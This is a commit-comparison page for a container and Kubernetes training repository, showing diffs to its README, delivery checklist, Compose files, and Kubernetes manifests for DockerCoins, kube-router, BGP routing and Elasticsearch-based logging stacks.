Compare commits


12 Commits

Author SHA1 Message Date
Jerome Petazzoni
0900d605ef fix-redirects.sh: adding forced redirect 2020-04-07 16:48:55 -05:00
Jerome Petazzoni
f67cfa8693 Add Lucas' amazing diagram 2018-02-21 18:17:57 -08:00
Jerome Petazzoni
cb8690f4a3 Add Lucas' amazing diagram 2018-02-21 18:16:59 -08:00
Jérôme Petazzoni
7a6d488d60 Merge pull request #112 from bridgetkromhout/indexconf2018
Clarification
2018-02-21 18:12:45 -08:00
Bridget Kromhout
b1d8b5eec8 Merge branch 'master' of https://github.com/jpetazzo/container.training into indexconf2018 2018-02-21 18:10:04 -08:00
Bridget Kromhout
1983d6cb4f Detail fix 2018-02-21 18:06:12 -08:00
Jérôme Petazzoni
e565da49ca Merge pull request #111 from bridgetkromhout/indexconf2018
Indexconf2018
2018-02-20 15:07:49 -08:00
Bridget Kromhout
ee33799a8f Only 2 worker nodes 2018-02-20 15:34:05 -06:00
Bridget Kromhout
b61426a044 emoji fix 2018-02-19 19:41:39 -06:00
Bridget Kromhout
fd057d8a1e Slight edits 2018-02-19 19:40:16 -06:00
Jerome Petazzoni
4b76fbcc4b Add _redirects 2018-02-19 15:50:22 -08:00
Bridget Kromhout
b25d40f48e indexconf2017 2018-02-18 20:21:55 -06:00
385 changed files with 4816 additions and 66168 deletions

.gitignore vendored

@@ -1,24 +1,11 @@
*.pyc
*.swp
*~
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
node_modules
### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride
### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db


@@ -1 +0,0 @@
image: jpetazzo/shpod


@@ -1,24 +0,0 @@
Checklist to use when delivering a workshop
Authored by Jérôme; additions by Bridget
- [ ] Create event-named branch (such as `conferenceYYYY`) in the [main repo](https://github.com/jpetazzo/container.training/)
- [ ] Create file `slides/_redirects` containing a link to the desired tutorial: `/ /kube-halfday.yml.html 200`
- [ ] Push local branch to GitHub and merge into main repo
- [ ] [Netlify setup](https://app.netlify.com/sites/container-training/settings/domain): create subdomain for event-named branch
- [ ] Add link to event-named branch to [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] Update the slides that say which versions we are using for [kube](https://github.com/jpetazzo/container.training/blob/master/slides/kube/versions-k8s.md) or [swarm](https://github.com/jpetazzo/container.training/blob/master/slides/swarm/versions.md) workshops
- [ ] Update the version of Compose and Machine in [settings](https://github.com/jpetazzo/container.training/tree/master/prepare-vms/settings)
- [ ] (optional) Create chatroom
- [ ] (optional) Set chatroom in YML ([kube half-day example](https://github.com/jpetazzo/container.training/blob/master/slides/kube-halfday.yml#L6-L8)) and deploy
- [ ] (optional) Put chat link on [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] How many VMs do we need? Check with event organizers ahead of time
- [ ] Provision VMs (slightly more than we think we'll need)
- [ ] Change password on presenter's VMs (to forestall any hijinx)
- [ ] Onsite: walk the room to count seats, check power supplies, lectern, A/V setup
- [ ] Print cards
- [ ] Cut cards
- [ ] Last-minute merge from master
- [ ] Check that all looks good
- [ ] DELIVER!
- [ ] Shut down VMs
- [ ] Update index.html to remove chat link and move session to past things
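The `slides/_redirects` step in the checklist above is a one-line Netlify rule. A minimal sketch of creating it, assuming the half-day Kubernetes deck (branch and deck names are illustrative; the trailing `!` makes the redirect forced, as in the top commit of this compare):

```shell
# Run from the repository root, on the event-named branch.
# "200" rewrites / to the deck; "200!" forces the rewrite even if
# a file already exists at the requested path.
echo "/ /kube-halfday.yml.html 200!" > slides/_redirects
git add slides/_redirects
git commit -m "Redirect / to the kube-halfday deck"
```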


@@ -39,7 +39,7 @@ your own tutorials.
All these materials have been gathered in a single repository
because they have a few things in common:
- some [shared slides](slides/shared/) that are re-used
- some [common slides](slides/common/) that are re-used
(and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
Markdown source files;
@@ -199,7 +199,7 @@ this section is for you!
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from losing your place if you get disconnected from servers.
prevent you from loosing your place if you get disconnected from servers.
https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IPs.
- Forget to have fun and focus on your students!
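A short sketch of the Mosh/tmux fallback suggested in the list above (the hostname and session name are placeholders):

```shell
# Mosh runs over UDP, so it survives wifi drops that kill plain SSH.
mosh docker@node1.example.com

# On the VM, keep your work in a named tmux session...
tmux new -As workshop
# ...and re-attach to it after any disconnection:
tmux attach -t workshop
```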
@@ -247,17 +247,6 @@ content but you also know to skip during presentation.
- Last 15-30 minutes is for stateful services, DAB files, and questions.
### Pre-built images
There are pre-built images for the 4 components of the DockerCoins demo app: `dockercoins/hasher:v0.1`, `dockercoins/rng:v0.1`, `dockercoins/webui:v0.1`, and `dockercoins/worker:v0.1`. They correspond to the code in this repository.
There are also three variants, for demo purposes:
- `dockercoins/rng:v0.2` is broken (the server won't even start),
- `dockercoins/webui:v0.2` has bigger font on the Y axis and a green graph (instead of blue),
- `dockercoins/worker:v0.2` is 11x slower than `v0.1`.
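A quick sketch of trying the variants listed above:

```shell
docker pull dockercoins/rng:v0.1
docker pull dockercoins/rng:v0.2
# v0.1 starts a web server on port 80; v0.2 is intentionally broken
# and should exit with an error right away:
docker run --rm dockercoins/rng:v0.2
```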
## Past events
Since its inception, this workshop has been delivered dozens of times,
@@ -292,31 +281,15 @@ If there is a bug and you can't even reproduce it:
sorry. It is probably a Heisenbug. We can't act on it
until it's reproducible, alas.
If you have attended this workshop and have feedback,
or if you want somebody to deliver that workshop at your
conference or for your company: you can contact one of us!
# “Please teach us!”
If you have attended one of these workshops, and want
your team or organization to attend a similar one, you
can look at the list of upcoming events on
http://container.training/.
You are also welcome to reuse these materials to run
your own workshop, for your team or even at a meetup
or conference. In that case, you might enjoy watching
[Bridget Kromhout's talk at KubeCon 2018 Europe](
https://www.youtube.com/watch?v=mYsp_cGY2O0), explaining
precisely how to run such a workshop yourself.
Finally, you can also contact the following persons,
who are experienced speakers, are familiar with the
material, and are available to deliver these workshops
at your conference or for your company:
- jerome dot petazzoni at gmail dot com
- jerome at docker dot com
- bret at bretfisher dot com
(If you are willing and able to deliver such workshops,
feel free to submit a PR to add your name to that list!)
If you are willing and able to deliver such workshops,
feel free to submit a PR to add your name to that list!
**Thank you!**


@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout


@@ -1,2 +0,0 @@
hostname frr
log stdout


@@ -1,34 +0,0 @@
version: "3"
services:
bgpd:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr


@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.3
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-scheduler --master http://localhost:8080
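Assuming this Compose file is saved as `docker-compose.yaml`, a sketch of the edit that the placeholder line above asks for (the cluster number 99 is arbitrary):

```shell
# Pick a unique CIDR for this cluster, then drop the reminder line.
sed -i 's/10\.CLUSTER\.0\.0/10.99.0.0/' docker-compose.yaml
sed -i '/Edit the CLUSTER placeholder/d' docker-compose.yaml
docker-compose up -d
```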


@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
name: kube-router
namespace: kube-system
spec:
selector:
matchLabels:
k8s-app: kube-router
template:
metadata:
labels:
k8s-app: kube-router
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg


@@ -1,28 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.3
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-scheduler --master http://localhost:8080


@@ -5,3 +5,6 @@ RUN gem install thin
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80
HEALTHCHECK \
--interval=1s --timeout=2s --retries=3 --start-period=1s \
CMD curl http://localhost/ || exit 1
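With that HEALTHCHECK in place, Docker tracks the container's health status; a sketch, assuming the image is built and tagged locally:

```shell
docker build -t hasher:healthcheck .
docker run -d --name hasher hasher:healthcheck
# Status moves from "starting" to "healthy" (or "unhealthy" after
# 3 consecutive failed probes, per --retries=3 above):
docker inspect --format '{{.State.Health.Status}}' hasher
```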


@@ -28,5 +28,5 @@ def rng(how_many_bytes):
if __name__ == "__main__":
app.run(host="0.0.0.0", port=80, threaded=False)
app.run(host="0.0.0.0", port=80)


@@ -2,14 +2,14 @@ version: "2"
services:
elasticsearch:
image: elasticsearch:2
image: elasticsearch
# If you need to access ES directly, just uncomment those lines.
#ports:
# - "9200:9200"
# - "9300:9300"
logstash:
image: logstash:2
image: logstash
command: |
-e '
input {
@@ -47,7 +47,7 @@ services:
- "12201:12201/udp"
kibana:
image: kibana:4
image: kibana
ports:
- "5601:5601"
environment:


@@ -1,21 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
annotations:
traefik.ingress.kubernetes.io/service-weights: |
whatever: 90%
whatever-new: 10%
spec:
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 80
- path: /
backend:
serviceName: whatever-new
servicePort: 80


@@ -1,15 +0,0 @@
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
version: v1alpha1
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof


@@ -1,35 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
properties:
spec:
required:
- taste
properties:
taste:
description: Subjective taste of that kind of coffee bean
type: string
additionalPrinterColumns:
- jsonPath: .spec.taste
description: Subjective taste of that kind of coffee bean
name: Taste
type: string
- jsonPath: .metadata.creationTimestamp
name: Age
type: date


@@ -1,29 +0,0 @@
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: arabica
spec:
taste: strong
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: robusta
spec:
taste: stronger
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: liberica
spec:
taste: smoky
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: excelsa
spec:
taste: fruity
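Assuming the CRD above is saved as `coffees-crd.yaml` and these resources as `coffees.yaml` (both file names are illustrative), a sketch showing the printer columns in action:

```shell
kubectl apply -f coffees-crd.yaml
kubectl apply -f coffees.yaml
# TASTE and AGE come from additionalPrinterColumns in the CRD;
# "cof" works thanks to the declared shortName.
kubectl get cof
kubectl get coffee arabica -o jsonpath='{.spec.taste}'
```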


@@ -1,86 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.6"
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave
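A sketch of checking that the three replicas above formed a cluster (pod names follow the StatefulSet naming convention):

```shell
kubectl rollout status statefulset consul
# All three pods should show up as "alive" server members:
kubectl exec consul-0 -- consul members
```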


@@ -1,28 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: build-image
spec:
restartPolicy: OnFailure
containers:
- name: docker-build
image: docker
env:
- name: REGISTRY_PORT
value: #"30000"
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
mkdir /workspace &&
git clone https://github.com/jpetazzo/container.training /workspace &&
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
docker push localhost:$REGISTRY_PORT/worker
volumeMounts:
- name: docker-socket
mountPath: /var/run/docker.sock
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock


@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker
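Assuming the full manifest above is saved as `dockercoins.yaml` (an illustrative file name), a sketch of deploying the stack and locating the web UI:

```shell
kubectl apply -f dockercoins.yaml
kubectl get deployments
# webui is the only NodePort service; note the allocated port:
kubectl get service webui
```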


@@ -1,69 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: cerebro
name: cerebro
spec:
selector:
matchLabels:
app: cerebro
template:
metadata:
labels:
app: cerebro
spec:
volumes:
- name: conf
configMap:
name: cerebro
containers:
- image: lmenezes/cerebro
name: cerebro
volumeMounts:
- name: conf
mountPath: /conf
args:
- -Dconfig.file=/conf/application.conf
env:
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
---
apiVersion: v1
kind: Service
metadata:
labels:
app: cerebro
name: cerebro
spec:
ports:
- port: 9000
protocol: TCP
targetPort: 9000
selector:
app: cerebro
type: NodePort
---
apiVersion: v1
kind: ConfigMap
metadata:
name: cerebro
data:
application.conf: |
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
hosts = [
{
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
name = "demo"
auth = {
username = "elastic"
password = ${?ELASTICSEARCH_PASSWORD}
}
}
]


@@ -1,19 +0,0 @@
apiVersion: elasticsearch.k8s.elastic.co/v1
kind: Elasticsearch
metadata:
name: demo
namespace: eck-demo
spec:
http:
tls:
selfSignedCertificate:
disabled: true
nodeSets:
- name: default
count: 1
config:
node.data: true
node.ingest: true
node.master: true
node.store.allow_mmap: false
version: 7.5.1


@@ -1,168 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: eck-demo
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.inputs:
- type: container
paths:
- /var/log/containers/*.log
processors:
- add_kubernetes_metadata:
host: ${NODE_NAME}
matchers:
- logs_path:
logs_path: "/var/log/containers/"
# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# node: ${NODE_NAME}
# hints.enabled: true
# hints.default_config:
# type: container
# paths:
# - /var/log/containers/*${data.kubernetes.container.id}.log
processors:
- add_cloud_metadata:
- add_host_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
hostNetwork: true
dnsPolicy: ClusterFirstWithHostNet
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat:7.5.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: demo-es-http
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
- name: varlog
mountPath: /var/log
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: varlog
hostPath:
path: /var/log
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: eck-demo
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
---


@@ -1,17 +0,0 @@
apiVersion: kibana.k8s.elastic.co/v1
kind: Kibana
metadata:
name: demo
spec:
version: 7.5.1
count: 1
elasticsearchRef:
name: demo
namespace: eck-demo
http:
service:
spec:
type: NodePort
tls:
selfSignedCertificate:
disabled: true

File diff suppressed because it is too large.


@@ -1,176 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: fluentd
rules:
- apiGroups:
- ""
resources:
- pods
- namespaces
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: fluentd
roleRef:
kind: ClusterRole
name: fluentd
apiGroup: rbac.authorization.k8s.io
subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: fluentd
namespace: default
labels:
app: fluentd
spec:
selector:
matchLabels:
app: fluentd
template:
metadata:
labels:
app: fluentd
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
- name: FLUENT_ELASTICSEARCH_PORT
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
volumeMounts:
- name: varlog
mountPath: /var/log
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
terminationGracePeriodSeconds: 30
volumes:
- name: varlog
hostPath:
path: /var/log
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: elasticsearch
name: elasticsearch
namespace: default
spec:
selector:
matchLabels:
app: elasticsearch
template:
metadata:
labels:
app: elasticsearch
spec:
containers:
- image: elasticsearch:5
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
---
apiVersion: v1
kind: Service
metadata:
labels:
app: elasticsearch
name: elasticsearch
namespace: default
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: kibana
name: kibana
namespace: default
spec:
selector:
matchLabels:
app: kibana
template:
metadata:
labels:
app: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
name: kibana
resources: {}
---
apiVersion: v1
kind: Service
metadata:
labels:
app: kibana
name: kibana
namespace: default
spec:
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
type: NodePort


@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
name: es
spec:
kibana:
image: docker.elastic.co/kibana/kibana-oss:6.1.3
image-pull-policy: Always
cerebro:
image: upmcenterprises/cerebro:0.7.2
image-pull-policy: Always
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
image-pull-policy: Always
client-node-replicas: 2
master-node-replicas: 3
data-node-replicas: 3
network-host: 0.0.0.0
use-ssl: false
data-volume-size: 10Gi
java-options: "-Xms512m -Xmx512m"


@@ -1,94 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
resources: ["cronjobs", "jobs"]
verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets", "deployments"]
verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: elasticsearch-operator
subjects:
- kind: ServiceAccount
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
template:
metadata:
labels:
name: elasticsearch-operator
spec:
containers:
- name: operator
image: upmcenterprises/elasticsearch-operator:0.2.0
imagePullPolicy: Always
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 8000
name: http
livenessProbe:
httpGet:
path: /live
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 10
readinessProbe:
httpGet:
path: /ready
